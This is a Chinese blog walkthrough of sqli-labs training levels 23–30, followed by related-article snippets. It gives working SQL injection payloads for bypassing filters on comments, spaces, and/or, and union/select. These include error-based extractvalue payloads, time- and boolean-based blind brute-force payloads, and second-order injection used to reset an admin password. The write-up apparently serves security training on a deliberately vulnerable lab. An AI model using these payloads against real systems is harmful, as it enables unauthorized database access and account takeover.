sqli 靶场 Level23-Level30 wp

IT安全:绕过过滤的SQL注入技巧与WAF挑战
最新推荐文章于 2025-12-02 17:50:12 发布
原创 最新推荐文章于 2025-12-02 17:50:12 发布 · 689 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #数据库 #服务器

文章详细描述了在Web应用程序中遇到的各种SQL注入挑战,包括如何绕过and,or,union等关键字过滤,使用特殊字符和编码技巧进行盲注攻击,以及在WAF保护下的破解策略。

level-23 (注释被过滤)

抓包

寻找注入点

  • id=1’,id=1’',成周期性变化

POC

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))--+'

结果:failed。怀疑–被过滤掉了,试试前后闭合方案

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))+and+'


结果:ok。

level-24(二次注入)

这一关比较特殊,是用类admin的账号去修改admin的密码。
思路:
(1)我们注册一个admin'--admin'#admin' and '1admin' or '1 的账号。这是第一次注入
(2)我们通过这个账号修改密码来修改隐藏的admin账户的密码。这是第二次注入
第一个'在这里是为了闭合前面的'
--后者#这里起到注释的效果
列出更改密码的sql更好理解:

usernamesql
admin'--update table_x set pasword='123' where username='admin'-- ' and password='456;
admin'#update table_x set pasword='123' where username='admin#'-- ' and password='456;
admin' and '1update table_x set pasword='123' where username='admin#'-- ' and password='456;
admin' or '1update table_x set pasword='123' where username='admin#'-- ' or password='456;
  1. 注册账号

    注意--后面是有空格,否则起不到注释的效果
  2. 登录新账号修改密码(456)
  3. 验证(密码456)


    ==》 成功登录admin

level-25 (and、or被过滤)

抓包

寻找注入点

''存在

POC

  • POC:id=-1'+or+extractValue(1,concat(0x73,user()))--+

发现and,or关键字被屏蔽了,还是不区分大小写的屏蔽


  • 使用union

结果:成功注入

  • 使用aandnd/anandd --> and

POC: id=-1'+aandnd+extractValue(1,concat(0x73,user()))--+

level-25a(and、or被过滤盲注)

抓包

寻找注入点

  • POC:id=1' and if(1,sleep(3),sleep(0))--+
    ==》不休眠
  • POC:id=1" and if(1,sleep(3),sleep(0))--+
    ==》休眠

==》存在注入

POC

  • step1: 猜字符串长度:POC: id=1+aandnd+if(length(user())=§1§,sleep(3),0)--+

==》14

  • step2:猜每个字符: POC: id=1+aandnd+if(substr(user(),§1§,1)='§a§',sleep(3),0)--+

==》root@localhost

level-26 (空格、注释被过滤)

抓包

查看正常请求和响应

寻找注入点

  • 使用单双引号,发现输出周期性变化,存在注入

POC

试试union select
  • POC: '+union+select+1,user(),3--+
    ==》 空格被过滤了


==》 因为空格被过滤了,所以and,union都使用不了,--+也使用不了
寻找其他替代方案:&&替代and,后’闭合替换--+

试试逻辑&
  • POC: id=1'&extractvalue(1,concat(0x7e,user(),0x7e))&'                        //字符串拼接&

    ==》 无反应
试试逻辑&&
  • POC: id=1'&&extractvalue(1,concat(0x7e,user(),0x7e))&&'                  //逻辑&&
试试&使用%编码

POC: id=1'%26extractvalue(1,concat(0x7e,user(),0x7e))%26'                    //字符串拼接,&使用%编码

==》 成功爆出

试试&&使用%编码

POC: id=1'%26%26extractvalue(1,concat(0x7e,user(),0x7e))%26%26'                      //&&使用%编码

==》 成功爆出

试试|

POC: id=1'|extractvalue(1,concat(0x7e,user(),0x7e))|'                //使用|

==》 成功爆出

试试||

POC: id=1'||extractvalue(1,concat(0x7e,user(),0x7e))||'   //使用||

==》 成功爆出

试试|使用%编码

POC: id=1'%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c'                        //|使用%编码

==》 成功爆出

试试||使用%编码

POC: id=1'%7c%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c%7c'                     //||使用%编码

==》 成功爆出

试试()代替空格

POC: 1'aandnd(extractvalue(1,concat(0x7e,user())))='1

==》 成功爆出

试试0a%

==>爆破失败,%0a也被过滤掉了

总结

  • 空格被过滤了
    • 试试&,&&,|,||以及他们的%编码
    • 试试()
  • 因为空格被过滤了,不能使用--+

level-26a (空格、注释被过滤,盲注)

抓包

同level-26

寻找注入点

同level-26

POC

因为没有回显,只能通过盲注爆破

  • 获取字段的长度
    POC: 1'%26%26if(1=1,length(user())=§1§,0)=0%26%26'1


    ==》14
  • 爆破每个字符
    POC: id=1'%26%26if(1=1,substring(user(),§1§,1)='§a§',0)=0%26%26'1

    ==》root**@localhost ****  **

level-27 (union select被过滤)

抓包

寻找注入点


==>存在

POC

  • POC: 1'+%26%26+extractvalue(1,concat(0x7e,user(),0x7e))%26%26'
     ==> 过滤掉了空格
  • POC: id=1'+union+select+1,2,3,4--+

==》 union select被过滤了

既然空格和union select都被过滤了,试试使用&&、&、||、|、()、%0a+报错函数+前后闭合这种方式

POC: id=1'|extractvalue(1,concat(0x7e,user(),0x7e))|'

==》成功爆破。

当然使用其他%26%26、%26、||,也是可以的

level-27a (union select被过滤,盲注)

抓包

同level27

寻找注入点

同level27

POC

同level27,不过加上了盲注,盲注可以参考26a。

  • 求字符串长度

POC: 1"+and%0aif(length(user())=§1§,1,0)="1

  • 求每个字符
    POC: 1"+and%0aif(substring(user(),§1§,1)='§a§',1,0)="1

level-28 (过滤select、union)

抓包

注入点

  • 11"回显正常 ,1'回显错误,存在单引号 字符型注入
  • 2'%26%26'1'='1,回显为id=1,存在小括号

(2&&1=1)的结果是1,所以id不论怎么变都和id=1。若没有小括号,id等于几,回显多少关的数据

POC

  • 爆破列数
    id=1')+order+by+10--+
    因为有空格,所以–+不能使用
    id=1')%0aorder%0aby%0a10%26%26'1'=('1
    语句错误
    ==》数据库列数爆破失败,回显位只能不断尝试。
  • 爆破回显位
    • 测试过滤
      id=1')+union+select+1,2,3+or+'1'=('1

==》空格被过滤了
==》 #被过滤了
==》--被过滤了
==》union select被过滤了
==》union空白字符select也被过滤了

  • 尝试获取列数

id=1')%0aorder%0aby%0a10;%00
order by利用二分法爆破
注:%00代表NULL,用来表示字符串的结束,相当于C中"/0",因为用不了注释,这里使用%00

==》爆出列数4

  • 尝试%0a代替空格
    id=0')%0aunion%0aselect%0a1,2,3%0aor('1'='1

==》union%0aselect被过滤了

  • 尝试构造union select

id=0')%0aunionunion%0aselect%0aselect%0a1,2,3%0aor('1'='1

  • 再回显位爆破username,database

id=0')%0aunionunion%0aselect%0aselect%0a1,database(),3%0aor('1'='1

==> 爆破成功,user()虽然没爆破出来,我们可以利用第二个位置填入user,再试一次即可。
注:当然上面也可以使用;%00,即替换后面%0aor('1'='1

level-28a (过滤select、union,盲注)

抓包

寻找注入点

略,同level-28

POC

同level-28

当然你也可以尝试盲注

level-29 (waf保护)

前言:阻抗失衡一般用于解释。这一关要路径带入login.php,否则是没有WAP轻易爆破

抓包

寻找注入点

POC

level-30 (waf保护,盲注)

前言:同level-29,url路径带入login.php;

抓包

寻找注入点

POC

vuInhub靶场实战系列--prime:2
专注Python编程与网络安全领域,分享原创技术文章与靶机渗透实战经验。以清晰的逻辑解构复杂技术,用深入浅出的笔触呈现:从Python基础到高级特性,从漏洞原理到攻防实践。在这里,代码与安全交织,思考与成长同行。
06-08 1954
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍prime:2靶机渗透测试,该系统主要包含LFI和SMB漏洞,具体内容包括主机扫描(nmap\netdiscover\arp-scan)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch\gobuster)、wpscan扫描、netcat、反弹shell、容器相关内容、linux内核提权等内容。目标主机扫描目录扫描wpscan扫描netcat监听。
sqli-labs靶场题解(less 1-18)
ph0ebus的博客
03-07 848
入门sql注入
DAY22:sqli-labs 靶场通关wp(Less01~~Less20)
qq_49433473的博客
08-04 1441
Sqli-labs靶场 1-20关通关手册,报错注入及其详细。
sqli-labs 漏洞平台靶场练习 总结 wp
Alexhirchi的博客
04-03 1775
文章目录题目-持续更新Less-1~10 GET型注入题Less11~22 POST型注入题Less23~32 WAF绕过数据库信息 题目-持续更新 Less-1~10 GET型注入题 ​ 基本的一些联合查询注入 Less-1.字符型 规定id=1,2,3 构造闭合 id=-1’ 内容 # Less-2.数字型 直接加SQL语句 id=-1 内容 Less-3.字符型 闭合方式是(‘ 内...
ichunqiu Web SQli wp
weixin_45253216的博客
01-11 372
2020.1.10 菜鸡今天又来水题了。 其实这个题,不是很水【狗头】在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了。咋一看还蛮友善的,其实涉及的知识点还蛮多的(自我感觉,毕竟不会的太多了) 本题涉及的知识有: waf fuzz测试 sqli注入fuzz字典 spintf()函数格式化字符串,导致单引号逃逸 实践判断sql注入点 sqlmap多参数使用 编写利用脚本 如果还有相关知识再做补充,下面开始本题wp。 首先进入题目环境,是一
实验吧简单的sql注入之3WP
Yale的博客
03-19 1508
就上图不说话(sqlmap) 这种题目对于初学sqlmap的人还是很好玩的
sqli-labs靶场分析
RestoreJustice的博客
03-18 3840
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
Sqli-labs WP
qq_41996851的博客
05-08 593
环境搭建 需要phpstudy以及sqli-labs源码。把sqli-labs源码放好后,启动phpstudy的Apache和Mysql,如果无法启动mysql,考虑关闭mysql/删除本地mysql。 更换phpstudy数据库密码,并修改sqli-labs数据库连接文件; ********\phpstudy_pro\WWW\range\sqli-labs\sql-connections\db-creds.inc 如果嫌路径麻烦可以考虑创建网站: 这样就可以用域名和端口号访问,这里会直接走本地DNS解
利用pikachu靶场字符注入获取user表中的信息并显示wp
11-13
根据用户需求,用户希望获取利用pikachu靶场进行字符型注入(GET方式)获取user表中信息并显示的详细操作步骤(wp)。我将结合提供的引用内容,整理出详细步骤。 引用内容中提供了多种方法,包括联合查询(union ...
爆破,命令执行与dvwa靶场
ing_end的博客
02-11 4076
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户名和密码被加密,用burp自带解码工具解码 发现用户名和密码中间用冒号隔开 爆破成功 web22 题目:域名也可以爆破的,试试爆破这个ctf.show的子域名 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
sql 注入练习题
可乐的博客
02-16 4717
sql注入习题 来源于ctfs.me的一道习题,实在做不出来,google了wp,发现这道题目是引自于其他习题集了,而且原题目是有源码的。。。于是趁机把他的题目做了一遍 http://35.184.20.243:8003/ &lt;——sql注入靶场地址 level1 这道题目其实没有源码也是可以做的,不过需要简单思考一下 $query = "SELECT * FROM secrets...
bwapp通关(全完结)
热门推荐
hxhxhxhxx的博客
10-20 2万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
sqli-labs通关wp
D-R0s1的博客
04-11 6743
第一关: 方法一:在id=1后面加一个单引号后发现报错 然后把这个单引号注释掉试一下 使用'or 1=1--+ order by 查列数页面显示正常了。存在注入,先查一下列数 http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+ 使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order...
IceCTF2016-部分WP
xuqi7
08-27 9067
HelloWorld! 直接提交即可 IceCTF{h3l10_wr0ld}     Spotlight 查看源码,在spotlight.js中发现flag IceCTF{5tup1d_d3v5_w1th_th31r_l095}     Allyour Base are belong to us 二进制转ascii即可 IceCTF{al1_my_bases_are_you
TensorRT笔记(5):研究timingCache
ouliten的博客
12-02 916
在里出现了大量的timingCache,但是当时没有取研究这是干啥的,本文就来解析一下。样例都基于上面的文章。
Spring Boot与MyBatis
2509_94090418的博客
11-30 1192
Spring Boot是一个用于创建独立的、基于Spring的生产级应用程序的框架,它简化了Spring应用的初始搭建以及开发过程。MyBatis是一款优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射。将Spring Boot和MyBatis结合使用,可以高效地开发数据驱动的应用程序。
基于Springboot2+Vue2的旅游景点购票系统
自学网站s.jf3q.com,菜鸟的成长之路
12-02 615
本系统是一个集旅游景点信息展示、在线购票、用户游记分享与互动交流于一体的综合性平台。核心价值在于提供便捷的景点门票预订服务,同时构建活跃的旅游社区,促进用户间的经验分享。
Plugin ‘org.springframework.bootspring-boot-maven-plugin‘ not found的解决方法
2509_94105214的博客
11-30 238
尝试使用 VPN 或更换网络环境,然后再次执行 Maven 构建命令。出现这个报错通常是因为 Maven 无法找到相应的 Spring Boot Maven 插件。如果仍然有问题,请提供更多详细信息,例如完整的错误堆栈跟踪和你的 Maven 配置,以便我更好地帮助你解决问题。如果没有,可以将相应的配置添加到父项目的。执行 Maven 的清理命令,然后重新构建项目。这将清除所有已编译的类文件和错误的依赖缓存,并重新下载正确的依赖。如果你的项目是基于父项目的,检查父项目的。
sqli靶场:Less-8 GET - Blind - Boolian Based - Single Quotes 这个靶场的打法
最新发布
12-04
sqli靶场Less - 8 GET - Blind - Boolian Based - Single Quotes是基于布尔的单引号盲注类型。以下是具体打法: #### 1. 获取当前服务器正在使用的数据库的名称的长度 可以构造如下Payload对目标发起攻击(使用布尔盲注): ```plaintext ?id=1' and if(length(database())=1,1,0) --+ ``` 当返回 `You are in...........` 时,证明猜测正确,否则猜测错误。若猜测数据库名长度为8的Payload如下: ```plaintext ?id=1' and if(length(database())=8,1,0) --+ ``` #### 2. 获取数据库的各个字符 获取数据库第一个字符的Payload: ```plaintext ?id=1' and if(mid(database(),1,1)='s',1,0) --+ ``` 获取数据库第二个字符的Payload: ```plaintext ?id=1' and if(mid(database(),2,1)='e',1,0) --+ ``` #### 3. 抓包爆破表内字段名(以`users`表为例) 第一个字段名的第一个字符猜测Payload: ```plaintext 1' and substr((select column_name from information_schema.columns where table_schema = 'security' and table_name='users' limit 1,1),1,1)='s' --+ ``` 第二个字段名的第一个字符猜测Payload: ```plaintext 1' and substr((select column_name from information_schema.columns where table_schema = 'security' and table_name='users' limit 2,1),1,1)='s' --+ ``` #### 4. 猜测第二个字段的长度和字符 第二个字段的长度的查询语句: ```plaintext http://192.168.195.110/sqli-labs/Less-8/?id=1' and ((select length(column_name) from information_schema.columns where table_schema="security" and table_name="users" limit 1,1)=8) -- + ``` 猜第二个字段的每个字符: ```plaintext http://192.168.195.110/sqli-labs/Less-8/?id=1' and (ascii(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 1,1),1,1))=117) -- + ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值